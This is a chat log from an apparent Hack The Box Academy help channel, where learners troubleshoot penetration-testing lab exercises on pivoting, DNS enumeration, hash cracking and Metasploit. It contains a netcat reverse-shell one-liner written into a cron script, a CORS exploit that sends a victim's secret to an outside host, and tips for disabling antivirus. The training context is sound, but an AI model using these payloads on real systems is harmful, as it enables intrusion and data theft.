Hi I am doing RDP and SOCKS Tunneling with SocksOverRDP section of "PIVOTING, TUNNELING, AND PORT FORWARDING" module. I downloaded the SocksOverRDP for AMD64 and transferred it to the Windows machine via RDP. I now need to load the SocksOverRDP.dll using regsvr32.exe. However, when I unzip the SocksOverRDP, I can see the .dll file. But after a while, it disappears automatically. Why is this happening?
I have tried it multiple times and this happens every time.
I get this error message when I try to load it because the file has been deleted for some reason:
real-time protection is running
So I should first disable it for this to work?
yep
real-time protecting SocksOverRDP-server.dll as a malicious dll
and is yeeting it
Made some progress by standing up smbserver, but still some kinks. Anyone have a good article for certutil for file downloads?
AD Trust Attacks: SID Filter Bypass CVE-2020-0665. When I modify ftinfo.py to parse msDS-TrustForestTrustInfo's data it doesn't show child.inlanefreight.ad as the module says it should. Am I doing something wrong?
I was still able to get the exploit working and obtain the flag and everything, but this doesn't reflect the information the module shows.
I managed to disable real time protection and load the dll file. However, when I RDP into the internal server, I get the following error:
I tried to ping the RDP server from the command prompt, but I don't get any response. That might have also been due to ICMP packets being disabled.
A --> B --> C
there's a middle host you have to connect to
A is the first target; C is the target the question wants you to connect to
A doesn't share a network with C; but it does with B
B also shares a network with C
😉
and yes you do have all the info, this section is a guide
well.. not all the info.. real time protection lol
i just meant to move forward
not sure why they haven't added that RTP thing yet. i guess it's for a reason or they would have already.
but they disable other parts of the av heh
is that actually covered in some windows basics module?
¯\_(ツ)_/¯
it could also be a slight show that defender isn't the only protection running on Windows machines
in arguably the most difficult part of the pivot module? heh
i don't recall anyone even asking for help on the skills assessment just this part
I got access to the intermediate server
I cannot find the realtime protection settings in the server
what happens when you click open windows security
you turn off real-time protection for the device you are launching the .dll from
I need to repeat the same steps that I did for the first target server right?
nope
So, I am trying to load dll on the intermediate server as well
you don't need to load the dll on the second server
read the instructions again 😉 it only has you load the dll once; then has you set up the client exe
Search for Virus & threat protection settings
RTP is only running on the initial host
I have searched for it. Cannot find the settings
I don't understand, why do we even need to load the dll once again?
I mean could I not simply RDP into the the intermediate server without loading dll?
you run the exe on the second host
because the dll is used as a bridge from A --> B to be able to connect to C
You could do a lot of things to connect. This section is showcasing the SocksOverRDP method
^
i mean in all technicality you can connect to C from B
but that's not the point of the module
it's to teach you how to pivot through a network
the dll itself hooks into the remote desktop program
(which is why you get the success message and all that as shown by the module)
then on server 2 you run the exe which hooks back to the first host (finishing the bridge)
now for the fun part; Proxifier facilitates the connection
the instructions here; if you look
say socksoverrdpx64-server.exe not .dll
I did it
did you get the success message when you launched the mstsc.exe?
yes
Or the proxifier?
yeah admin prompt up there
well it seems like it either didn't load right or should be reloaded
and try again
It still gives the same error
launch the remote service after loading dll
Yes I reloaded the dll
And then tried executing the exe file
and I get the same error
yes but did you load the dll before or after you launched the remote desktop
When you remoted in as victor, did you get this?
^
The first time I got this message
you need this message
Now its using previous settings I guess
this section overall (at least with SocksOverRDP) is just a pain
hi everyone
am stuck on Attacking Common Services "Attacking sql db's" section
flag value is not showing up
any help please
I have set up the proxifier
But when I connect to the internal target I get the error
Have you applied the settings from the performance consideration section?
Not much more you can do about connection quality. Maybe try changing vpn regions, or restarting the whole environment and trying again. make sure you apply the settings to all rdp sessions.
That command is not part of that module, and there is no section "attacking sql db's"
Try using the commands from the module
there are no cmds that list the columns' data so i searched it
HTB Academy is a great start
i write in short
I mean, what to do here ?
I am also getting this error in proxifier
The module gives you the commands to complete this. You need to enumerate the databases, then the tables, then select the information from the table.
you can crack the hash
am just stuck on flagDB. how i can read its content? i searched a lot
Re-read the "SQL Syntax" section
I have this on my notes:
Can I get some help ?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
thank you
thanks a lot i was working on it for the last 4 hours.🥹 @cloud urchin
Did you get it?
yeah i got the flag
nice work
mate i have one question
the machine in the final engagement of the shells & payloads module is too slow. every click takes 3 seconds. is there any solution for this?
Hello folks, can i do a video writeup about the hackthebox modules?
I believe that if you can explain to someone something very well is the ultimate way of learning something
I remember i switched vpn from eu 1 to eu 2 and it worked way more smoothly. But still not optimal.
I'd say switch around some regions and see what's best.
Other than that, bite your teeth together and power through. It's not a long live eng.
hey guys can anyone help me with this "Connection has timed out" problem, it's making me mad and I'm unable to solve challenges from modules.
What should I do?? Need urgent help!! I have to check ping status every 5 minutes to check whether it's up or not
I believe HTB only allows Tier 0 modules’ content for publishing.
Reach out to support
I didn't find anything that's helping me on support, I seriously need help regarding this
Open a ticket with Support. Only the support team can help you in such a situation
Need to speak to a person? Learn how to reach our support via HTB Labs.
It has been a long time since you posted, yet did that hasher work for you? I get an error flag when i post the answer!
Gm
Hi, Thank you i will try and will tell you 🙂
Where can i find someone to talk to about billings?
same, currently suffering with kerberos stuff, just stuck there for hours just bc the machine is too slow and I can't help myself
annoys a lot
the task itself is not difficult just a slow machine
I regret now taking this challenge, just thought it would be great if I cover it, but I cannot skip those tasks since it's not acceptable for me
too annoying buddy. i can feel.🥹
If it's questions about a subscription we might be able answer, if it's an issue with billing you will need to reach out to support. The green bubble on the lower right of the page.
It was weird looked like i was billed twice on my banks app but it got fixed so idk all good i guess now
Anyone having issues on the pivoting and tunneling skills assessment RDP connection?
I've changed VPN servers and closest I get is the welcome screen and it sits
can we only use pwnbox on web? is rdp also allowed to pwnbox?
bcz certain actions are not applied in pwnbox then.
like when i press ctrl+w it closes the pwnbox tab rather than the tab of the browser i am using within pwnbox.
it is very difficult to use pwnbox in browser.
You can use your own vm
when am trying to get root flag using meterpreter; using this command echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.217 8083 > /tmp/f" >> monitor.sh
it says Text file busy , hungup
what should I do?
Which module, which section? Which question?
Penetration Tester -> Getting Started -> Nibbles Privilege Escalation -> root flag
If I remember correctly, the module is structured like a walkthrough. Follow the module exactly
doing same but not working
There is an alternate method of connecting to RDP other than username and password. any hint about it
i searched but nothing found
yep i did the same
but the problem is the same
this is not the same 😉
Check the command
i also did the same thing just like this writeup but getting the same error again and again.
restart the lab an try again
okay let me try again
Is that a question? Yes, there exist other methods than using pass/username
it is a hint
from the module of Attacking common services section attacking rdp
am stuck
tried lots of ways
is it priv esc?
Weren't you asking about payload n shell a few hours ago?
Jumping and skipping other modules is bad
.
And for this module i haven't done it yet since i haven't worked on htb for more than a month now
i just asked about it i solved and i completed till now
all the modules
Hi, I tried this advice and none of the zones I found match the target IP. I also followed your advice and took a look at https://www.cloudflare.com/learning/dns/glossary/dns-zone/, but I'm still not understanding my mistake.
I'm looking for all of the SOA and PTR records because I think this is the right path.
can dm me
it's always better to use your own VM!
I treat pwnbox like this, when I can't do certain things bcz of my VPN issues I just spin up the pwnbox!
in the socksoverrdp section of pivoting, is the second server supposed to be pingable once proxifier is set up on the pivot host and socks is set up on the first server
you may DM if you have any tip, am opened to suggestions
or share it here I don't mind
yo why cant i write messages on general chat
either way; this could be considered spoilers
read and follow #welcome
module?
you don't need a long wordlist
i meant which module you goon lmao
You have an idea on how to solve that question 1? from Broken authentication (Predictable Reset Token)
that doesn't help
module name and section name are more helpful
the numbers don't mean shit
that's not a module name
the NAME of the module
such as "Network Enumeration with NMAP"
that's the section name
there is no module named "Virtual Hosts"
thank you
long wordlist btw doesn't mean it would contain the same words as the right wordlist
it just means it has a lot of words
some just happened to get answers
i tried logging in with .\jason instead of just "jason" since the hint mentioned local accounts but i still can't connect to the second server
you don't need to login with it as local
the second server's user isn't jason
read the section carefully, it's a detailed list of steps, including the second host
is it victor
yes
this section is all about double hopping
the question tells you to get to server 3
the jump host is server 1
i meant server 3, sorry
you connect to 1 (A) --> run the dll
You then connect to B from A --> and then run the .exe
You then (on A) set up Proxifier
then (if everything is set up right) A --> C
all creds and hosts are provided in the section
did you figure this out yet
Yo,can someone help me?
ask your question and someone may help
no one can answer questions you don't ask
You're right. I've got a question on the footprinting module.
It's the last one about DNS where I'm expected to find the FQDN of the host where the last octet ends in 203. I believe I'm on the right track, but I'm sure I'm missing something.
hello how can i connect with smb (with the username bob)
thanks
are you using the showcased bruteforce tool?
hint: the tool isn't limited to the base domain
(there's other hints, but it's also covered by the hint button i believe)
the answer will be format {ans}.{subd}.inlanefreight.htb
I tried that at first, and the domains I found didn't match criteria, so I stepped away from that, and now I'm using the bash script that was shown in the module as well. It seems to be pulling the same results, so I know this is operator error.
Now I'm looking in the options and trying other lists, but it's all permutations of the info I already have.
So now I'm trying to see if there's something else I'm missing in my understanding, or if there's a place I can do a reverse lookup, but I'm 100% sure I'm supposed to bruteforce this.
the bruteforce tool is the way to go
it only looks as high as you tell it
Right, and I looked in this chat and someone suggested to use the small lists instead of the large ones, and I used those, but I still didn't see anything new.
if you only tell it to look at the base domain (inlanefreight.htb) it doesn't dig deeper
did you do a basic zone transfer (no tools)
Right, so I told it to look at the domains I found in the bruteforce.
to see what subdomains are potentially available?
first step: dig axfr inlanefreight.htb @ip
Yep. I (think?) I know all of them.
no bruteforce tools yet
Did that, and I have that info in my notes.
then one of those subdomains will have your answer
Then, I checked the SOA record because of this blog's advice: https://www.cloudflare.com/learning/dns/glossary/dns-zone/
SOA won't be helpful
Thanks, I'll try again within this scope.
PTRs?
Ah... That was my mistake.
You're correct. Thank you.
that CF site was purely for people asking about what a DNS zone is
it's not telling you to look at SOA for anything
2 ways to move forward from this information
either manually check each subdomain with the tool
OR
create a list with the subdomains, and use a for loop
since it's a relatively small list
¯\_(ツ)_/¯
hi
@fathom pendant I'm using the tool with a very large list and a for loop to make sure I don't miss anything. If that doesn't work, could I PM you and show you my methodology?
id_rsa file belongs to user dennis
but i was able to login as root using the file
please explain my confusion
Perhaps use a more fierce list
Shadow ping pong
Not all wordlists are created equal
The ssh key is password protected
Oh...he is on that task.
He needs to crack that first to use it
Yup, he will have some fun.
¯\_(ツ)_/¯
yes, i cracked passphrase using john,
what i dont understand is
id_rsa belongs to user dennis but how user root can login through that id_rsa
Logical leap
Why would he password protect it

d* might be the computer admin so the key is reused for both (not smart)
G0b knew and removed it then /s
I knew one of those links he sent in DMs was weaponized.
Bro installed a camera device on a monitor, somehow
Looking for some help in the virtual Hosts module of Information gathering - web edition
I'm stuck on finding out what the "HOST Header" is
I understand i'll need the vhost list while fuzzing to get the info I need, but Idk what my "HOST header" will be
-H "HOST: "
As likely shown in the section
so I just leave it blank afterwards
will it be www.inlanefreight.htb
-H "HOST: FUZZ.inlanefreight.htb"
For ffuf
Or using a for loop -H "HOST: ${subdomain}.inlanefreight.htb"
ok i got it
I was putting www. in front and it didn't work for me at all
so I needed to get rid of the www
Yep the next fun part is properly filtering
After this is crawling
You'll notice a lot of results with the same length... but they all direct to the default login page if you curl them with the host header (same -H parameter)
Nah if you notice the pattern after a few seconds you can ctrl-c instead of waiting
Since it will hit 200 on everything in the list
Response size filtering is the next step
(Unless you already did that)
I didn't do that yet

Alright so, what do you notice as the common size, filter that out
(-fs)
Ffuf has 2 types of filters
Filter out and match in
They use the same syntax except filters are -f(N) and matches are -m(N)
M for when you want the result, f for fuck it and throw it out
So then I'd wanna do a -m(N) to save some time?
Nope
(N) is replaced
Btw
But you don't know the size you want to match
But you do know what size you don't want
man ffuf or ffuf -h should give you syntax info
says 612
Curl one of those subdomains curl ip -H "HOST: subdomain.inlanefreight.htb"
And do that a few times to see
Or add a few to your /etc/hosts
first I need to get my list of subdomains. I didn't even do the vHost fuzzing to get the list of subdomains
Nope the basic namelist in the Seclists dns enumeration should have the subdomains
The point I'm trying to get you to see is. Is 612 the size you want?
If not, then filter it out
So then there's no point in me doing the vHost fuzzing
And ffuf won't give you those results
I'm telling you how to be more effective with it
You got it down to at least give you some info
But is the info it's given so far useful
If it's not, use the tool's options to get it to be more effective
After having a smol panic attack I understand now @fathom pendant
Lmao I read this like 10x and was so confused and then I it clicked after running || cat /opt/useful/SecLists/Discovery/DNS/namelist.txt | while read vhost;do echo "\n********\nFUZZING: ${vhost}\n********";curl -s -I http://10.129.42.195 -H "HOST: ${vhost}.inlanefreight.com" | grep "Content-Length: ";done ||
So this result brought up a bunch of random bs and what I really needed was the subdomain list with the size of 612. But I don't know what the correlation is with 612. I do see it says its the default response size but is that all there is to it?
I got my results by running || ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.42.195 -H "HOST: FUZZ.inlanefreight.com" -fs 612 ||
this gave me the list I was looking for, thanks for the help!
sup everyone i need help on ADVANCED XSS AND CSRF EXPLOITATION-->CORS Misconfigurations
i have found the vuln page but when i set the origin to the exploit server nothing seem to happen here is my exploit
||```html
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://vulnerablesite.htb:53255/profile.php', true);
xhr.withCredentials = true;
xhr.onload = () => {
  var doc = new DOMParser().parseFromString(xhr.response, 'text/html');
  var msg = encodeURIComponent(doc.getElementById('secret').innerHTML);
  location = 'https://exfiltrate.htb:53255/log?data=' + btoa(msg);
};
xhr.send();
</script>
```||
im glad for any suggestions
Is there any way for me to filter this down besides going and testing every one of these?
What's the common size
If you wanna spoiler the command, you put the || on the outside btw
sry didn't notice
With what ffuf parameter
-ms or -fs
-fs
|| ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.42.195 -H "HOST: FUZZ.inlanefreight.com" -fs 612 ||
is what I used
Well if the common size is this, why are you using ||612||
well actually all I see is 10918
-fs filter out responses of this size
Yes
Which means your filter is wrong lmao
-fs <size>
Or list,of,sizes
If you know 10918 isn't correct, by deduction, then you want ffuf to not show you those responses
Also
I noticed another issue
inlanefreight.com
I took out the || -fs612 || and got the same answer
stop 😭
I see my ways of error 😦
So you do -fs x
Since those common sizes, are the default page
You know they dont have the info you are looking for
Your problem is mostly copy/pasting the given example command without actually thinking
Apply brain
I now think you have one
Delete
You goober
why i did the spoiler
Hello, I have a weird problem. When I connect to dante pro lab, I can’t access the lab network…
I get an answer from an external address when I ping into the lab network
To be fair, I did copy and paste but I thought I changed everything I needed to... I just didn't think that hard on this is all....
Wrong channel brother
Which is the right one?
Need to speak to a person? Learn how to reach our support via HTB Labs.
Apply brain
The way I did the questions I did I silly little for loop with the found subdomains and curl and grep
I'll do better master 😦
but i haven't come here for a while so that's good 🙂
You haven't helped in a good chunk
Hello i'm doing the Pass The Ticket on linux section
I wanna know, when i do an "ls -la" on the /tmp directory there are tickets for julio
How do i know which one hasn't expired? Both tickets have the same date
hi, is anyone else having connection issues with HTB?
my connection to targets seems very unreliable today 😦
the expiry of the ticket is embedded within the ticket itself, you won't see it running ls -la, import the ticket and run klist
Thanks
I'm taking a nap rip file transfer
I hope they fixed the US spawn giving an invalid date
It would default to 01/01/1970 
I hope they fix the US servers in general 
¯\_(ツ)_/¯
I just bugged them about it for one module and it worked ™️
Took 8+ hours but yknow internals and stuff
I am currently doing password attack hard lab and i am unable to crack ||Logins.kdbx||
I have tried both hashcat and john with the mutated password list
Hi @fathom pendant, could I PM you? I think I'm messing up on something with this scan.
Well, did you use the appropriate 2john?
yes, ||keepass2john||
Your answer will be in the form of subdomain2.subdomain1.inlanefreight.htb
And you confirmed that the file isn't empty
If you didn't use python2.7 it can create an empty hash which is dumb
But it's doable with mutated list afaik or at least rockyou
Yeah guide says mutated as well so
@lunar brook I didn't say you could dm me, you can fuck off idc about your "project"
What do you think would be the best place to substitute the subdomain for the tool to bruteforce @weak shell
You don't have to change anything but that
You don't need to specify a different IP or anything like that
you mean , python2.7 to transfer file from victim windows to linux??
No
With keepass2john
It's that last bit that I'm changing based off of what I got from the dig enumeration
Here's my script:
||```
# zones is a file that I created from the dig enumeration
for zone in $(cat zones.txt); do TOOL --dnsserver $IP --enum -p 0 -s 0 -o subdomains.txt -f WORDLIST $zone; done
```||
@fathom pendant
Can I send that in plaintext, or is that against TOS?
Is zones.txt the subdomain.inlanefreight.htb
Yep
Ah
anyone done attacking web applications recently?? Does the drupalgeddon3 work? it's throwing: [-] Exploit failed: NoMethodError undefined method `first' for nil:NilClass
It's missing something
if u are writing a report and u find clear text creds in nfs and smb shares would u put both of them together in the CVSS scoring like Insecure File Share or put them both individually like Insecure File Share NFS, Insecure File Share SMB
Gotcha
Delete though
Okay. I'll try harder.
Individual findings
Thanks for the sanity check. I apologize for bothering.
Dm me with just your dig results
It seems like you might be overcomplicating it
Step one dig
Step 2 use results to bruteforce
Somehow you got steps 1.a-1.z messing with your brain
any1 ?
Looks like you're loading it in msfconsole
Sometimes restarting the msfconsole fixes the Nil class error
solved it,
when i transferred the file through ftp and generated the hash, it was not cracked
¯\_(ツ)_/¯
but when i transferred the file through smb and generated the hash it was cracked
why?
hash were diff
Could be many reasons
One being file corrupted in transit
¯\_(ツ)_/¯
One small hiccup in your internet
i tried multiple times, did a machine reset, rebooted my vm, and re-transferred the file.
these things make it hard to solve the labs
wasted 1 full hour
Always have multiple methods of file transferral
In case you suspect one is being dumb, do another
(Also xfreerdp has the /drive: option)
Which you can mount a directory as a fileshare
Btw that file is only step 1/5
ok
Lots of back and forth with this lab
You should learn and use the Get-FileHash command in Powershell to do checksums
Get-Help Get-FileHash -Online
Can't do -Online on target boxes 
you can try -Examples but it probably won't have the extra help stuff downloaded
tbh a quick Google usually sorts me out ¯\_(ツ)_/¯
Trying to learn more PS over here 😛
Have you tried gestures vaguely the powershell docs
The Get-FileHash cmdlet computes the hash value for a file by using a specified hash algorithm. A hash value is a unique value that corresponds to the content of the file. Rather than identifying the contents of a file by its file name, extension, or other designation, a hash assigns a unique value to the contents of a file. File names and exten...
that's what that command sends you 😛
i have what may seem a dumb question, i connect to htb via a vpn, so when i have to ssh, i have to type ssh htb-student@10......(ip address), and after that, the password THB_@cadem...., my question is, is there a way that i can automate this, and just enter the new ip since it's always the same user and pwd, i am guessing it could be possible, but not sure it is, it is not an issue, and not super urgent, so, whoever has the time to answer this is perfect. thank you.
Nope
it's possible for sure
As the generated target IPs are dynamic
It would probably take longer to set it up than would actually be worth it
absolutely lol
It's also not always the same user/password
And sometimes it's on an alt port or public_ip:port
Or rdp
i'm sure you can make some python script to get the html page and read if it's ssh, rdp, grab the user/pass, then connect using it all
like MarcieLee said it'd be a lot of effort
but if it were the same ip address, like a home server, and the same user name and password for it, would it be possible with some script or something like it?
it's possible with htb too, but yeah static variables would make it a lot easier to script
imagine an RDP shortcut, that's essentially what it does, just saves the login info/hostname and connects to it without you inputting stuff
ok, i'll look into it, thank you again, have a great day
The ips are hardly ever static
They are spun up and given an ip from an available range
Occasionally the stars align and you get the same ip as the examples
You can spin the same target up 3 separate times and get 3 different IPs
oh, i have a home server for testing, and i am thinking on installing linux on it, so i can use it as a hack box
That's not how this works
The target ips aren't static
Unless you mean setting up your own scenarios
In which case, sure you can automate it
thats it
But that goes beyond the scope of academy
Also the term you'd be looking for may be "home lab"
yeah i mean, i am setting up a lab, in my home, and
Not your own "hack the box"
And if you want advice on homelab setups there's a whole ass channel for it
yup, my mistake, thats what i meant
For the people who did pentest path, are there any modules similar to Password Attacks module?....i hope not
I mean
Password attacks opens up a broad technique set
That you'll use throughout
¯\_(ツ)_/¯
It's skills you'll get used to
It's the time i have to take on some labs that i don't like, i understand it is brute force but i think it should be a bit shorter
Everyone works through the modules at different speeds. What is slow for you others may get quickly and vice versa.
And the overall question wording is a bit confusing if not misleading tbh
Sure thing
Just gotta think outside the box
Or at least understand that you're generally given an end goal, not a starting point
just finished IPMI footprinting that mask is useless
The mask is for specific circumstances if you actually read
yeah i getcha however i had gotten used to the format of the provided commands being relevant for the questions
my poor gen-z brainrotted brain has to actually think outside the box
whatever am i going to do
You have a brain? /s
are there ever opportunities to suggest or offer changes or updates to the content?
#1234357888114364508 if it's a clarification change or /feedback
Or if you're really feeling it messaging support
@fathom pendant
in footprinting linux remote management protocol it says:
Allowing password authentication allows us to brute-force a known username for possible passwords. Many different methods can be used to guess the passwords of users. For this purpose, specific patterns are usually used to mutate the most commonly used passwords and, frighteningly, correct them
what does it mean by correct them sorry?
Password list weak, mutated password list strong, rules are applied to a generic list to make permutations like p455w0rD!
As Unga as I can break it down
If you try and mutate rockyou I hear your hard drive kills itself
i will try later
unga boonga
Try using the full path like shown in the sudo -l output, including /user/bin/python3
Threw me for a loop before too
why cant i talk in off topic
Read #welcome and follow the instructions
alr thanks
I'm getting a consistent timeout across VPN endpoints in the AD enum and attacks module's "Attacking Domain Trusts - Child -> Parent Trusts - from Linux". Neither the manual method nor raiseChild.py is working for me. I've followed the steps meticulously but I must be missing something. Was wondering if anyone else had run into this issue in the past. Thanks!
I was able to complete it
You may want to reconnect to the vpn, or re-download the vpn to regenerate it, or change regions and try again.
Done both of those unfortunately
Is this a high-traffic time or smth?
Just timeout at every turn
are you trying from the internal box or your own
My own
I haven't got an attackbox spun up
I can give that a try
It'd only be the fourth time I've learned that lesson...
not the attack box
the internal box, the pivot host
how are you pivoting into the network?
that tells me nothing, exactly how are you doing that
ssh dynamic port forwarding, chisel, ligolo
Nothing
well there's your problem
your vm won't be able to connect to the private vlan without setting up a pivot of some kind
I think the target box on the inside is a linux box
No
Okay, I am stuck on the Shells & Payloads Live Engagement Host 2. I tried resetting msf and the options for the ||50064.rb|| exploit.
Here are my options:
||```
msf6 exploit(50064) > options

Module options (exploit/50064):

   Name       Current Setting           Required  Description
   PASSWORD   admin123!@#               yes       Blog password
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.1.12               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                        yes       The target port (TCP)
   SSL        false                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                         yes       The URI of the arkei gate
   USERNAME   admin                     yes       Blog username
   VHOST      blog.inlanefreight.local  no        HTTP server virtual host

Payload options (php/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   LPORT  4444             yes       The listen port
   RHOST  172.16.1.12      no        The target address

Exploit target:

   Id  Name
   0   PHP payload
```||
Here is the output after I run the exploit:
||```
msf6 exploit(50064) > run

[-] Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass
[*] Exploit completed, but no session was created.
```||
What am I missing?
Christ that's long
Target is an AD DC
Restart msfconsole and try again
Where are you executing the tools from, your VM or the pivot host?
The linux attack host
which is...
All my VM is running is SSH
I'm using target loosely as the 10.129.x.x box
Nothing local
My bad. The target is the linux attack host provided
are you able to ping the DC from the attack host?
I'm not able to ping either of them
Your copy/paste is missing info did you set the vhost as the fqdn blog.inlanefreight.local
But that may be LOOSELY related to the fact that Windows is pre-configured to ignore them
Also helps to wrap text like that in backticks so it's formatted better and easier to read
``` before and after
Generally when you're in the network environment they'll respond to pings
Or they should
Yeah, my bad. I restarted it and still getting the error. My VHOST option is set to "blog.inlanefreight.local"
Strange you can't ping your attack host but can ssh into it
🤦‍♂️
What are all the regions you tried?
it is what you said
He's saying he can't ping the DC from the provided host
try a totally different region like EU
He said he can't ping the DC or the attack host
Are you pinging FQDN or the actual IP
I'd start by trying EU region, sounds like something may be borked
^ this is most likely btw
Also was getting ticked bc thought my enter key was going before realizing slowmode was on. 😂
Did not want to replace that.
Danke for the patience gents.
Yeah slow mode is on in the academy channels because spammers
i'm slow so i need it
Sorry to waste y'all's time.
not a waste
🙏
Is ||VHOST blog.inlanefreight.local|| the correct syntax for the VHOST option in Shells & Payloads Live Engagement for Host 2 exploitation (||50064.rb|| exploit)?
Yes
Try resetting the target and restarting your attack box as a whole
Same error 😦
||[-] Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass||
I hate that this is what I was missing for the past few hours... Thanks for the help
Yeah
It seems like a lot of modules are having issues spawning internal networks and such on the US servers
Definitely will remember that for future modules
Done enough sanity checking the last few weeks lmao
For whatever reason the internal networks/boxes either don't spawn or don't work properly
The password attacks module was having issues with one section giving a 01/01/1970 ccache
Which is just a tiny bit expired
Stupid question, let's say I went through a module , but want to go through it again even if I dont score any extra cubes, can I reset progress or so I have to just remember where I am at?
when you launch the target machine it spawns a fresh instance for that module, it does not save anything done previously
You can retake the module too
No worries, thanks for answering, just want to brush up on AD before I attempt the CPTS
It won't clear your prior answers
ahh. what's it do then lol
Puts you in at the beginning of the module
thanks for the clarification
I'm sure if you bribed support hard enough you could
it would probably mess with the "completed" flag and maybe lose access if you don't have a subscription
I am stuck in the INFORMATION GATHERING - WEB EDITION module on the question "What FQDN is assigned to the IP address 10.10.1.5? Submit the FQDN as the answer." I ran this but don't get anything related to IP 10.10.1.5
what section
this sec ==> What FQDN is assigned to the IP address 10.10.1.5
Active Subdomain Enumeration
Yes that's the question
But it's likely related to the overall spawned target
I.e. doing a zone transfer or two should yield you answers
nslookup -type=any -query=AXFR inlanefreight.htb $ip
but not get anything related to that 10.10.1.5 ip
Im blocked in the module Linux fundamental
I'll send a screen
tips for getting effective help:
Module name:
Section Name:
question:
What is causing you trouble
Yes
but i also suggest using the command that may show the environment variables
But I did "ip address" and for the mtu idk his name
that is going to be incorrect
all of these ?
you need to be running the ip a command in the ssh session
all of the commands to find information need to be done in the ssh session
okay but how I do SSH
the instructions on how to ssh are on the academy page
did you click the button "Click here to spawn the target system!"
the spawn instance button is for the in-browser virtual machine aka pwnbox it is not the target
it's not gonna be 127.0.0.1
so how can I find the IP address
ohhh
i suggest doing the "Introduction to academy" module
as interacting with academy is taught in that module
wrong channel
read and follow #welcome and ask in #sherlocks
What FQDN is assigned to the IP address 10.10.1.5? Submit the FQDN as the answer. information gathering webaddition, active subdomain enum.
i'm stuck in this question
environment variables are useful
cat /etc/shells
that's not generally helpful
where can I found that?
there's a list of commands given at the top
i suggest reading what each of those do
just type env and hit enter
oh yes but I looked but I don't find anyway
any help for mine ?
i feel like i nudged you earlier
what have you tried; full syntax of command
can you give the command
scroll even further up
then any reference
well this module teaches you about dig yeah?
or nslookup?
what have you tried
here?
if you tell me what you've tried i can likely tell you where you're going wrong
wait i'm sending right now
yep
one of those commands relates to environment
i suggest reading and taking notes
you're not gonna remember all the things you learn right away
the more you do the more you'll learn
nslookup -type=any -query=AXFR inlanefreight.htb $ip
But I dont even know what is a shell 😢
i'm guiding you to find the answer
one step at a time
bro
you got the answer for the .136 question yeah?
and the .txt question?
look at that subdomain that you found those answers
yes I do ... but not this one using the same way
yes
that is the SHELL environment variable
meaning that's the shell that is used when a terminal session is started
bash is the bourne again shell
it's yeeting your output because it's a large block of text
but i'm telling you, it's in the subdomain you found the TXT record in
wait brother, again I'm trying the last one
i also suggest finishing modules before you start a new one
Thank you so much brother, I found
the Learning process module wasn't meant for you to stop in the middle of it and start on Linux Fundamentals
it's true
hi can you give me a hint about the section of rdp attacking in module of attacking common services.
there is already a hint: There is an alternate method of connecting to RDP other than username and password. But I am not able to find the method; I tried registry settings but nothing
anyone else
no i tried
Try reading the RDP Pass-the-Hash (PtH) section
well trying != reading
instead of using a password you can use something else
hold on
and without providing us your command syntax it doesn't help
copy/paste your command here, don't screenshot
Besides remoting into the machine with a hash, what else is covered in that section I mentioned?
Look at question 2, then question 3
I'm not getting it
Heya, how do I get BurpSuite to intercept HTTP responses?
It's in the proxy options
it's pretty clear if you read the section
Hey, I'm trying to do the live engagement in the webshell module, however the rdp session via pwnbox is very very sloooowwwwwwww. Many people have complained about the same issue on the internet - is there any way to resolve this? :/
nope
you can try changing to tcp connection or vpn region
Did you read the PtH section as I mentioned? Again, what other thing is listed in there beyond simply remoting in with the hash?
staring at the options menu, unless im blind im not seeing it >_>
i don't think he read the section at all
lol
there's a web proxies module
yes i did
no i did
then you'd see what you need to do
is this going to be the same experience during cpts exam?
all about setting up burp/zap proxy (to use your own browser) and various different labs to show it off
It's right in your face under proxy options. There are several sections, one is request interception rules the other is response interception rules.
¯\_(ツ)_/¯
found it, ty
are you running cmd as admin
but also; you can use evil with admin and hash
no, I can't run it, it's restricted
well the only way you can edit registry is with admin permissions
you can use evil-winrm to remote in
personally I'd just use cme and change the reg key, but i don't think that's covered in the module
yeah
but it's kinda strange as the walkthrough shows being able to do it with the htb-student user
yes
yeah i didn't use cme when i did it
same actually, I just used cme lmao
am trying too see what happens
try restarting your lab
confirmed, i was also able to do it with the low priv user
i was able to remote in as admin after the change too
It works exactly like the module says
so seems like your lab might be bugged
if restarting doesn't work; change vpn regions
don't need to evil-winrm
can just rdp with htb-rdp; run the command
simple as that
doesn't need admin perms to edit it
did you use runas /user:Admin.. cmd
ok
opened cmd and just ran it
Module: Attacking Common Services - Attacking SQL Databases
Enumerate the "flagDB" database and submit a flag as your answer.
I have the password for the mssqlsvc user. I'm using the following command to log in like I did before with the htbdbuser account, but I'm unable to log in with the mssqlsvc account.
i completed yesterday
now rdp with admin pth
you don't need to use the server name
I've tried it without the server name as well. I get the same output.
try .\\username
python3 mssqlclient.py mssqlsvc@10.129.203.12 -windows-auth use this
first go to mssqlclient.py dir
The command arguments you're using do not match up with what is taught in the module. Have you tried the command syntax from the module?
I actually did try the ones from the module initially and it failed, I found this syntax on the forums.
i don't know why it works fine now, I have been trying since yesterday. but thanks a lot. @cloud urchin you guys
Probably not your fault, some HTB regions are having issues lately.
i think it was the region like MarcieLee said
seriously bro i tried the same steps
yup, it's been happening a lot to people
yeah
mssqlclient.py user@ip -windows-auth
This worked. Why did I have to mention -windows-auth though? Doesn't that mean it's using windows authentication and not the SQL server authentication?
^ that's why i just used sqsh in this section i think
@normal sand
yes
because you're using the user's password to auth
and the sql-server is set to use windows authentication
The user's Windows account/password*
Maybe I'm misunderstanding, I thought windows auth was only for domain-joined users.
mssqlsvc is a windows service account
Some applications can use your Windows credentials for authentication
windows-auth is for local
Ahhh
as well
Also, is there a reason why I had to mention the python3 in order for it to work? I had tried the very same command earlier without python3 and it didn't work.
do you have python2.7 installed
it might be using that as your default python environment
How do I check?
if you do python -V i believe it should give version
I'm using pwnbox.
It said version 3.9.2
yeah
you didn't need to specify
the real resolution was using the right syntax
the using python3 is a non-issue
